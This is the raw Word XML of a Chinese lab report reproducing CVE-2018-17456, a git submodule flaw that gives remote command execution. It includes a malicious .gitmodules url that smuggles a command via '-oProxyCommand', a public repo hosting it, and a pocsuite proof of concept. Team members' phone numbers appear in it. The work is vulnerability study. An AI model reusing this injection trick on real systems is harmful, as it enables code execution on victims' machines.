      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8170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2"/>
        <w:gridCol w:w="1722"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="450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7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序号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职务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姓名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联系方式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1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组长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王伯雅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15503567789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2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李佳豪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13191110713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3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刘哲泽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16650717520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4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钟雨哲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17879630977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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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hint="eastAsia"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组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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吴帅达</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508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13375663376</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc18367"/>
      <w:bookmarkStart w:id="14" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="15" w:name="_Toc3137"/>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="20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git远程命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc5023"/>
      <w:bookmarkStart w:id="17" w:name="_Toc7909"/>
      <w:bookmarkStart w:id="18" w:name="_Toc33"/>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="871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43"/>
        <w:gridCol w:w="4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项目阶段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bidi="ar"/>
              </w:rPr>
              <w:t>工作内容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hint="eastAsia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环境搭建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hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN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在Ubuntu 20.04虚拟机上进行实验；下载的git版本为 1.10.0；在本人的gitee上设置一个带有“恶意”代码的仓库。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4343" w:type="dxa"/>
            <w:vAlign w:val="center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漏洞复现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:firstLine="420" w:firstLineChars="0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在本机终端中执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>git clone https://gitee.com/nk-jj/cve-2018-17456.git --recurse-submodule</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>s命令，即可看到本地下载多出了一个You_are_hacked的文件，表明“恶意”仓库中的touch命令被执行。</w:t>
            </w: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4343" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w: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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>POC插件编写</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>根据相关git代码执行漏洞模板进行poc的编写。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc29668"/>
      <w:bookmarkStart w:id="20" w:name="_Toc1860"/>
      <w:bookmarkStart w:id="21" w:name="_Toc18669"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4风险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="877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03"/>
        <w:gridCol w:w="1651"/>
        <w:gridCol w:w="57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0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编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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风险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721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风险描述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1403" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体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严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体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当运行git clone --recurse-submodules时，git会解析.gitmodules文件中的url字段，然后将其作为参数传递给git clone子进程。如果url字段是一个字符串，并使用短划线（-）开头，这个git clone子进程将会把url翻译为一个选项。这可能导致用户运行“git clone”时，会执行任意脚本。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="23" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="24" w:name="_Toc6133"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）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</w:rPr>
        <w:t>①在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的gitee中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>新建CVE-2018-17456仓库，在仓库中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建子模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子模块内容不重要，随意选择即可，本实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的子模块链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>仓库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hack（如图所示）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585085"/>
            <wp:effectExtent l="0" t="0" r="5715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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改.gitmodules代码，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用ssh代理，代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下所示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[submodule "hack"]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path = hack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>url  = ssh://-oProxyCommand=touch You_are_hacked/git@gitee.com:/nk-jj/cve-2018-17456</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="111950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其中的 touch You_are_hacked就是要执行的恶意代码，其作用为新建一个文件。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③在Win7 x64虚拟机上安装git 1.10.0版本，资源如下：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"http://pan.baidu.com/s/1jIjnaCY" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://pan.baidu.com/s/1jIjnaCY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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在命令行进入桌面，输入以下命令，最终文件会被下载到桌面：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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git clone https://gitee.com/nk-jj/cve-2018-17456.git --recurse-submodules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind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运行结果如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="2689225"/>
            <wp:effectExtent l="0" t="0" r="10160" b="82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spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc18532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1 风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>攻击者可结合钓鱼等社会工程手段，来实现对目标主机的控制。官方建议所有用户将客户端升级以实现对此漏洞的防护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc23034"/>
      <w:bookmarkStart w:id="27" w:name="_Toc10352"/>
      <w:bookmarkStart w:id="28" w:name="_Toc4033"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc75461104"/>
      <w:bookmarkStart w:id="30" w:name="_Toc28030"/>
      <w:bookmarkStart w:id="31" w:name="_Toc28445"/>
      <w:bookmarkStart w:id="32" w:name="_Toc10303"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地搭建平台进行漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写poc代码，并在python2的pocsuite环境下测试poc代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试中所用的工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Ubuntu 20.04操作系统；git 1.10.0版本；带有“恶意”代码的远程仓库：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://gitee.com/nk-jj/cve-2018-17456</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="34" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="35" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="36" w:name="_Toc12892"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc32666"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.1 POC插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/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bookmarkStart w:id="38" w:name="_Toc25120"/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# !/usr/bin/env python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# coding: utf-8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from pocsuite.api.request import req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from pocsuite.api.poc import register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from pocsuite.api.poc import Output, POCBase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from pocsuite.thirdparty.guanxing import parse_ip_port, http_packet, make_verify_url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import os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class TestPOC(POCBase):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vulID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cveID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cnvdID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cnnvdID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version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author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vulDate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createDate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updateDate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name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desc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solution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severity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vulType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taskType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references = ['''''']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appName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appVersion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appPowerLink = ''''''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samples = ['']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install_requires = ['''''']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def _verify(self):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self.url, ip, port = parse_ip_port(self.target, 80)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result = {}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headers = {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    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'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}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path = ""   # 漏洞的路径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vul_url = make_verify_url(self.url, path, mod=0)    # 生成完整路径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data = ''   # 漏洞的data数据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resp = req.post(vul_url, headers=headers, data=data, verify=False, allow_redirects=False, timeout=10)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if resp.status_code == 200 and '' in resp.content:  # 判断条件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    result['VerifyInfo'] = http_packet(resp)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    result['VerifyInfo']['URL'] = vul_url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    result['VerifyInfo']['port'] = port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cmd = "git clone https://gitee.com/nk-jj/cve-2018-17456.git --recurse-submodules"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text = os.popen(cmd).read()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flag = os.path.exists('cve-2018-17456/You_are_hacked')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return self.parse_output(flag)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def _attack(self):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return self._verify()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def parse_output(self, result):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output = Output(self)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if result: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    output.success(result)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else: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    output.fail('Failed')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 xml:space="preserve">        return output</w:t>
      </w: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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>register(TestPOC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.2 漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="9229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7"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="1569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default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs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bCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>UVD-ID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漏洞类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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hint="default"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1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>代码执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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default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CVE-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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spacing w:line="480" w:lineRule="auto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CVE-2018-17456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  <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>披露/发现时间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asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/7/18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bugtraq编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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CNNVD-ID：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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提交时间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asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/7/20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漏洞发现者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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CNVD-ID：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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漏洞等级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hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"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1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>严重/高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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提交者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="130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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>刘哲泽/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>吴帅达</w:t>
            </w:r>
            <w:bookmarkStart w:id="39" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="39"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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BEBEBE" w:themeFill="background1" w:themeFillShade="BF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搜索关键词</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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8"/>
              <w:spacing w:line="480" w:lineRule="auto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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>git，远程代码执行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影响范围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hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
